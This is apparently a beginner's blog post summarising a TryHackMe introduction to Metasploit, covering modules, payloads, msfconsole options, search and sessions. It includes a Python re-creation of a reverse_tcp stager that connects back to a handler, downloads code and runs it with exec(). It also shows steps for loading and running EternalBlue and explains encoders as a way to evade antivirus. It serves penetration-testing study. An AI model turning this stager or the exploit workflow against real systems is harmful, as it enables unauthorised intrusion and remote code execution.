Metasploit is the most widely used exploitation framework that supports all phases of a penetration testing engagement, from information gathering to post-exploitation.
Let’s start our daily #FromZeroToHacker challenge.
Introduction to Metasploit
What have I learnt today?
Introduction to Metasploit
The Metasploit Framework is a set of tools for information gathering, scanning, exploitation, exploit development, post-exploitation and more. It is not limited to penetration testing: it is also used for vulnerability research and exploit development.
Metasploit has two versions:
- Metasploit Pro: The commercial version, which adds task automation and management features and a Graphical User Interface (GUI).
- Metasploit Framework: The open-source and free version that works from the command line.
The main components of the Metasploit Framework are:
- msfconsole: The main command-line interface.
- Modules: Supporting modules such as exploits, scanners, payloads, etc.
- Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing.
Let’s start learning the main components of Metasploit.
The main components of Metasploit
We launch it with the `msfconsole` command. This console will be our main interface for interacting with all the different modules of the Metasploit Framework.
Before starting, a brief reminder of a few concepts:
- Exploit: A piece of code that takes advantage of a vulnerability present in the target system.
- Vulnerability: A design, coding or logic flaw affecting the target system.
- Payload: The code that the exploit delivers and that runs on the target system once the vulnerability has been triggered (for example, code that opens a shell). The exploit gets us in; the payload is what runs once we are in.
Let’s see some modules and categories from the Metasploit Framework:
Auxiliary
Any supporting module, such as scanners, crawlers, and fuzzers.
Encoders
Encoders allow you to encode the exploit and payload, hoping that a signature-based antivirus misses them.
As signature-based antivirus and security solutions have a database of known threats, our payloads can get caught instantly. Encoders can improve the success rate by hiding their signature.
Evasion
Instead of encoding, you can also try to evade the antivirus software.
Exploits
Exploits organised by the targeted system.
NOPs
NOPs (No OPeration) do…nothing. Really. They are used as padding (a NOP sled placed in front of the payload) so that the payload reaches the required size and execution still lands in it when the exact landing address is off by a few bytes.
Payloads
Payloads are the code that runs on the target system once a vulnerability has been exploited: getting a shell, loading malware, creating a backdoor on the target system, and much more.
Running commands on the target system is nice, but having an interactive connection that allows you to type commands (A Shell) is even better. Metasploit offers the ability to send different payloads that can open shells on the target system:
There are four different directories:
- Adapters: An adapter wraps a single payload to convert it into a different format, for example Python code wrapped so that it can be launched from PowerShell.
- Singles: Self-contained payloads (add user, launch notepad.exe, etc) that do not need to download an additional component to run.
- Stagers: Responsible for setting up a connection channel between Metasploit and the target system, while working with staged payloads.
- Stages: Downloaded by the stager. Because the stage is fetched over the connection rather than shipped inside the exploit, it can be much larger than a single payload.
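To make the stager/stage split concrete, here is an added example (my own code, not Metasploit's) that mimics what Metasploit's reverse_tcp stager and its handler do: the stager connects back, reads a 4-byte little-endian length, downloads the stage and runs it. The handler and stager run on loopback in two threads; `STAGE` is a constructed stand-in for what Metasploit would really send (for instance the Meterpreter DLL), here just Python source that records that it executed.

```python
"""Staged vs single payloads, modelled on Metasploit's reverse_tcp stager.

Added example (not Metasploit's code). Handler and stager run on loopback in
two threads. STAGE is a constructed stand-in for what Metasploit would send
(for instance the Meterpreter DLL): here it is Python source the stager runs.
"""
import socket
import struct
import threading

# Constructed stage: records that it executed and how big it was.
STAGE = b"result['ran'] = True\nresult['size'] = __stage_size__\n"


def handler(listener: socket.socket, stage: bytes) -> None:
    """What exploit/multi/handler does for a staged payload: accept the
    stager's connect-back, send the stage length as a 4-byte little-endian
    integer, then the stage body."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(struct.pack("<I", len(stage)) + stage)


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; TCP may deliver a large stage in several chunks."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("handler closed before the full stage arrived")
        buf.extend(chunk)
    return bytes(buf)


def stager(lhost: str, lport: int) -> dict:
    """The stager: the only code the exploit has to carry. It connects back,
    reads the length prefix, downloads the stage and hands control to it."""
    result: dict = {}
    with socket.create_connection((lhost, lport)) as sock:
        (size,) = struct.unpack("<I", recv_exact(sock, 4))
        stage = recv_exact(sock, size)
    exec(stage.decode(), {"__stage_size__": size}, {"result": result})
    return result


def single_payload() -> dict:
    """A 'single' ships the whole payload in one blob: no connect-back is
    needed before it can run, but the exploit must have room for all of it."""
    result: dict = {}
    exec(STAGE.decode(), {"__stage_size__": len(STAGE)}, {"result": result})
    return result


def run_staged_demo() -> dict:
    """Start a handler on an ephemeral loopback port and run the stager against it."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    lport = listener.getsockname()[1]
    t = threading.Thread(target=handler, args=(listener, STAGE), daemon=True)
    t.start()
    try:
        return stager("127.0.0.1", lport)
    finally:
        t.join(timeout=5)
        listener.close()


if __name__ == "__main__":
    print("staged:", run_staged_demo())
    print("single:", single_payload())
```

Two practical consequences follow from this. The handler must be listening before the exploit fires, otherwise the stager connects to nothing and the session never appears. And Metasploit's payload names tell you which kind you are using: `windows/meterpreter/reverse_tcp` (a slash between meterpreter and reverse_tcp) is staged, while `windows/meterpreter_reverse_tcp` (an underscore) is the single, self-contained version.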
Post
Post modules are used in the final stage of a penetration test, post-exploitation, once we already have access to the target.
Msfconsole
The console will be the main interface when using the Metasploit Framework. We can launch it with `msfconsole`.
The Metasploit console (msfconsole) works much like a regular command-line shell. We can even run system commands such as `ls`, `clear`, `history` or `ping` from it. It also has tab auto-completion.
One important thing to understand is that msfconsole is managed by context: parameters set on a module are lost when you switch to another module (unless they were set globally with `setg`, covered below). For example, once we run `use exploit/windows/smb/ms17_010_eternalblue`, the prompt changes from `msf6 >` to `msf6 exploit(windows/smb/ms17_010_eternalblue) >`.
Now we have a context set in which we will work. We can see it by typing the `show options` command:
This will print the options of the exploit we chose earlier. Depending on the exploit, we will have different options. For example, let's run `show options` while using a different exploit:
We can leave the current module with `back`:
We can gather more information about a module with the `info` command:
Search
One of the most useful commands in msfconsole is `search`. It searches the Metasploit Framework's module database for modules matching the search term.
This provides a list of modules that we can use, with columns such as Name, Disclosure Date, Rank, Check and Description. We can load one of the listed modules with `use <NUMBER>`, where the number is the index shown in the first column.
Exploits are rated based on their reliability (the Rank column):
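The Rank column is the module author's declared reliability, from excellent down to manual, and it is the first thing worth sorting by when `search` returns a long list. The following is an added example, my own code rather than anything from Metasploit or the room: it parses the table `search` prints and orders the exploits by rank. `SAMPLE_SEARCH` is constructed to mimic the msf6 layout (the module names, ranks and descriptions are the real ones to the best of my knowledge, but treat it as sample data), and the parser assumes the column alignment msfconsole prints, so it should also work on real output saved from `msfconsole -q -x "search ms17_010; exit"`.

```python
"""Parse `search` output from msfconsole and sort matches by Exploit Ranking.

Added example, not Metasploit's own code. SAMPLE_SEARCH is constructed to
mimic the msf6 table layout; the parser relies on the column alignment that
msfconsole prints (header row, dash row, then one line per module).
"""
import re

# Metasploit's exploit rankings, most reliable first.
RANK_ORDER = ["excellent", "great", "good", "normal", "average", "low", "manual"]

SAMPLE_SEARCH = "\n".join([
    "Matching Modules",
    "================",
    "",
    "   #  Name                                      Disclosure Date  Rank       Check  Description",
    "   -  ----                                      ---------------  ----       -----  -----------",
    "   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average    Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption",
    "   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution",
    "   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution",
    "   3  auxiliary/scanner/smb/smb_ms17_010                         normal     No     MS17-010 SMB RCE Detection",
    "   4  exploit/windows/smb/ms08_067_netapi       2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption",
    "",
    "Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms08_067_netapi",
])


def parse_search(output: str) -> list[dict]:
    """Turn the table into a list of {column: value} dicts, one per module."""
    lines = output.splitlines()
    for i, line in enumerate(lines):
        if line.lstrip().startswith("#") and "Name" in line and "Rank" in line:
            header, dashes, body = line, lines[i + 1], lines[i + 2:]
            break
    else:
        raise ValueError("no search results table found")
    # Column names come from the header; column boundaries from the dash row,
    # so an empty cell (e.g. a missing Disclosure Date) does not shift fields.
    names = re.findall(r"\S+(?: \S+)*", header)
    starts = [m.start() for m in re.finditer(r"-+", dashes)]
    bounds = list(zip(starts, starts[1:] + [None]))
    rows = []
    for line in body:
        if not line.strip():
            break  # blank line ends the table; the hint text after it is not a row
        cells = [line[a:b].strip() for a, b in bounds]
        rows.append(dict(zip(names, cells)))
    return rows


def rank_key(row: dict) -> int:
    """Position in RANK_ORDER; unknown ranks sort last."""
    rank = row.get("Rank", "").lower()
    return RANK_ORDER.index(rank) if rank in RANK_ORDER else len(RANK_ORDER)


def best_candidates(output: str, kind: str = "exploit") -> list[str]:
    """Module names of one type (exploit, auxiliary, post...), best rank first.
    The sort is stable, so equally ranked modules keep msfconsole's order."""
    rows = [r for r in parse_search(output) if r["Name"].startswith(kind + "/")]
    rows.sort(key=rank_key)
    return [r["Name"] for r in rows]


if __name__ == "__main__":
    for name in best_candidates(SAMPLE_SEARCH):
        print(name)
```

Rank is a declared property, not a guarantee: an average-ranked exploit such as EternalBlue can still crash the target, which is why the Check column (and the `check` command) matters before running anything. In msfconsole itself you can narrow the list before sorting with filters such as `search type:exploit platform:windows smb`.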
Working with modules
Once we have loaded a module with the `use` command, we need to set its parameters; which ones depends on the module. We set them with `set <PARAMETER_NAME> <VALUE>`.
Let's use this as an example. The RHOSTS, RPORT, VERIFY_ARCH and VERIFY_TARGET options are required. Often, as with the last three, they come pre-populated with sensible defaults, but RHOSTS is empty and we need to set it ourselves.
Notice that RHOSTS now has a value.
Even if every exploit has different options, we can often see common parameters such as:
- RHOSTS: Remote HOST, the IP address of the target system.
- RPORT: Remote PORT, the port on the target system.
- PAYLOAD: The payload we will use with the exploit.
- LHOST: Local HOST, the IP address of the attacking machine (the one the target will connect back to).
- LPORT: Local PORT, the port we will use for reverse shells on the attacking machine.
- SESSION: Each connection created to the target system using Metasploit will have its own Session ID. We can use this with post-exploitation modules that will connect to the target system using an existing connection.
We can reset all the values we have set (options with a default keep their default) with the `unset all` command:
We can set values globally, so that they survive switching modules, with `setg <PARAMETER_NAME> <VALUE>`. Notice the G (Global) after set.
Using modules
Once we have set all the needed values, we can launch the module with the `exploit` command or its alias `run`.
Some modules support the `check` command, which tests whether the target is vulnerable without running the whole exploit.
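The `use` / `set` / `setg` / `unset all` / `run` sequence above hides a rule that catches many beginners: `set` values belong to the current module and vanish on the next `use`, while `setg` values and module defaults survive. Here is an added example (my own model, not Metasploit's code) that implements exactly those rules, including the validation error msfconsole raises when a required option is empty. `MODULES` is a constructed option table for two modules mentioned in this room; real modules declare many more options.

```python
"""Model of how msfconsole keeps options: per-module `set`, global `setg`,
module defaults, and what `use` and `unset all` discard.

Added example, not Metasploit's own code. MODULES is a constructed option
table for two modules from this room; real modules declare many more options.
"""

# Constructed option tables: option -> (default value, required?)
MODULES = {
    "exploit/windows/smb/ms17_010_eternalblue": {
        "RHOSTS": (None, True),
        "RPORT": ("445", True),
        "VERIFY_ARCH": ("true", True),
        "VERIFY_TARGET": ("true", True),
    },
    "auxiliary/scanner/smb/smb_ms17_010": {
        "RHOSTS": (None, True),
        "RPORT": ("445", True),
        "THREADS": ("1", True),
    },
}


class Console:
    """Just enough of msfconsole to show the datastore rules."""

    def __init__(self) -> None:
        self.globals: dict = {}   # setg: survives switching modules
        self.module = None
        self.local: dict = {}     # set: belongs to the current module only

    def prompt(self) -> str:
        if self.module is None:
            return "msf6 > "
        kind, path = self.module.split("/", 1)
        return f"msf6 {kind}({path}) > "

    def use(self, name: str) -> str:
        """Switch context: anything `set` on the previous module is gone."""
        if name not in MODULES:
            raise KeyError(f"Failed to load module: {name}")
        self.module, self.local = name, {}
        return self.prompt()

    def set(self, option: str, value: str) -> None:
        self.local[option.upper()] = value

    def setg(self, option: str, value: str) -> None:
        self.globals[option.upper()] = value

    def unset_all(self) -> None:
        """`unset all` clears what we set on this module; defaults come back."""
        self.local.clear()

    def show_options(self) -> dict:
        """Effective value of each option: local set > global setg > default."""
        table = {}
        for option, (default, required) in MODULES[self.module].items():
            if option in self.local:
                value = self.local[option]
            elif option in self.globals:
                value = self.globals[option]
            else:
                value = default
            table[option] = (value, required)
        return table

    def missing(self) -> list:
        """Required options with no value: these make `run` fail validation."""
        return [o for o, (v, req) in self.show_options().items() if req and v is None]

    def run(self) -> str:
        """`exploit` / `run`: msfconsole refuses to start with empty required options."""
        gaps = self.missing()
        if gaps:
            raise ValueError("The following options failed to validate: " + ", ".join(gaps))
        return f"{self.module} -> {self.show_options()['RHOSTS'][0]}"


if __name__ == "__main__":
    c = Console()
    print(c.use("exploit/windows/smb/ms17_010_eternalblue"))
    c.set("RHOSTS", "10.10.10.5")          # assumed target address
    print(c.use("auxiliary/scanner/smb/smb_ms17_010"))
    print("missing after switching module:", c.missing())
    c.setg("RHOSTS", "10.10.10.5")
    print("missing after setg:", c.missing())
```

The habit this suggests: when you will point several modules at the same target (a scanner, then an exploit, then post modules), `setg RHOSTS` and `setg LHOST` once at the `msf6 >` prompt instead of retyping them, and run `show options` before `exploit` to confirm what the module will actually use.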
Sessions
Once a vulnerability has been exploited, a session is created: a communication channel established between the target and Metasploit. We can use the `background` command to background the session and return to the msfconsole prompt. List all existing sessions with `sessions`. To interact with a session, use the `sessions -i <NUMBER>` command.
Here is how we can go back and forth with sessions:
Summary
Metasploit is a powerful tool that can help us during the exploitation process. This process has three steps:
- Finding the exploit.
- Customizing the exploit.
- Exploiting the vulnerable service.
Metasploit, as we just saw, provides many modules that we can use for each step of the exploitation process.
Stats
From 78.514th to 77.283rd.
Here is also the Skill Matrix:
Resources
Path: Jr Penetration tester
Metasploit
TryHackMe: Metasploit: Introduction
Other resources
Nessus
OWASP Framework top 10 vulnerabilities
Rapid7
Vulnerability Databases
RCE
What the shell?
Staged payloads
Msfconsole cheat sheet
Exploit Ranking